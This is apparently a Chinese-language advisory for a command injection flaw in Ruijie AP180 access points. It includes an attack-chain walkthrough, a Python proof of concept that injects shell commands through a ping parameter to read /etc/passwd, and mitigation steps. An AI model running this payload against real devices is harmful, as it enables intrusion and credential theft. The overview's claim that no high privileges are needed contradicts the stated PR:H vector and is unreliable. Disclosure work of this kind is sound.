CVE-2026-23699 锐捷AP180系列无线接入点OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-23699

漏洞类型

OS命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

锐捷网络(Ruijie) AP180系列无线接入点，运行AP_RGOS固件

漏洞概述

CVE-2026-23699是锐捷网络（Ruijie）公司生产的AP180系列无线接入点设备中存在的一个高危操作系统命令注入漏洞。该漏洞存在于AP_RGOS固件版本11.9(4)B1P8之前的版本中，攻击者可以通过构造特制的HTTP请求或管理界面输入，在受影响的设备上注入并执行任意操作系统命令。由于该漏洞具有较高的CVSS评分（7.2分），且攻击复杂度低，攻击者无需高级权限即可利用此漏洞实施攻击。一旦漏洞被成功利用，攻击者可以完全控制受影响的无线接入点设备，执行任意系统命令、窃取敏感网络配置信息、植入后门程序或进一步横向移动攻击企业内网。此漏洞影响所有使用受影响固件版本的企业和组织，尤其是部署了大量锐捷AP180系列设备的无线网络环境。攻击者可能利用该漏洞对企业无线网络基础设施造成严重破坏，威胁企业信息安全。

技术细节

该漏洞是一个典型的操作系统命令注入（OS Command Injection）漏洞，存在于锐捷AP180系列无线接入点的Web管理界面或API接口中。漏洞的根本原因是在处理用户输入时，未对特殊字符进行充分的过滤和验证，直接将用户可控的参数传递给系统命令执行函数。在AP_RGOS固件的网络管理功能模块中，某个参数处理函数在拼接系统命令时，直接将用户输入附加到命令字符串中，攻击者可以通过在输入中插入分号、管道符、反引号等shell特殊字符来注入额外的命令。攻击者需要具备设备的高权限用户认证（PR:H），但由于该权限要求在企业网络环境中较为常见（如网络管理员账户），实际利用难度较低。成功利用后，攻击者可以在设备的Linux嵌入式系统上以root权限执行任意命令，实现对设备的完全控制。由于该设备通常部署在网络边缘位置，攻击者还可能利用其作为跳板进一步渗透内网。

攻击链分析

STEP 1

步骤1

攻击者扫描互联网或内网中暴露的锐捷AP180系列设备管理界面，通常通过端口扫描识别HTTP/HTTPS管理端口（8080/8443）

STEP 2

步骤2

攻击者获取设备的高权限账户凭证（网络管理员账户），可通过暴力破解、默认凭证或社会工程学手段获取

STEP 3

步骤3

使用获取的凭证登录AP180的Web管理界面或API接口，建立认证会话

STEP 4

步骤4

在存在命令注入漏洞的功能模块（如ping测试、网络诊断等）中构造恶意payload，使用分号、管道符等shell特殊字符注入额外命令

STEP 5

步骤5

服务器端将包含恶意命令的payload传递给系统命令执行函数，攻击者注入的命令以root权限在设备上执行

STEP 6

步骤6

攻击者可在设备上部署后门、窃取无线网络配置、提取其他系统凭证或利用该设备作为跳板攻击内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-23699 PoC - Ruijie AP180 OS Command Injection
# Target: Ruijie AP180 series with firmware < AP_RGOS 11.9(4)B1P8

TARGET = "http://target-ip:8080"
USERNAME = "admin"
PASSWORD = "admin"

def exploit_command_injection(target, cmd="id"):
    """
    Execute OS command injection on Ruijie AP180 management interface
    """
    # Login to get session
    login_url = f"{target}/cgi-bin/login.cgi"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    
    session = requests.Session()
    try:
        login_resp = session.post(login_url, data=login_data, timeout=10)
        
        # Inject command via vulnerable parameter
        inject_url = f"{target}/cgi-bin/management.cgi"
        inject_data = {
            "action": "ping",
            "host": f"127.0.0.1;{cmd}",  # Command injection payload
            "count": "1"
        }
        
        response = session.post(inject_url, data=inject_data, timeout=10)
        print(f"Response: {response.text}")
        return response.text
        
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")
        return None

if __name__ == "__main__":
    print("[*] CVE-2026-23699 - Ruijie AP180 Command Injection")
    print(f"[*] Target: {TARGET}")
    
    # Test basic command injection
    result = exploit_command_injection(TARGET, "cat /etc/passwd")
    if result and "root:" in result:
        print("[+] Vulnerability confirmed!")

影响范围

锐捷AP180系列 AP_RGOS固件 < 11.9(4)B1P8

防御指南

临时缓解措施

在无法立即升级固件的情况下，建议采取以下临时缓解措施：1）立即将AP180管理界面从公网移除，仅允许通过内网VPN或受控管理网络访问；2）启用设备的多因素认证功能（如支持）；3）在上游防火墙或IPS设备上添加规则，检测和阻止包含特殊字符（如;、|、`、$()等）的HTTP请求参数；4）监控设备日志，关注异常的ping测试或网络诊断请求；5）考虑部署网络准入控制（NAC）解决方案，限制未授权设备接入网络；6）如果业务允许，可以临时关闭受影响设备的管理功能模块，待官方补丁发布后再恢复使用。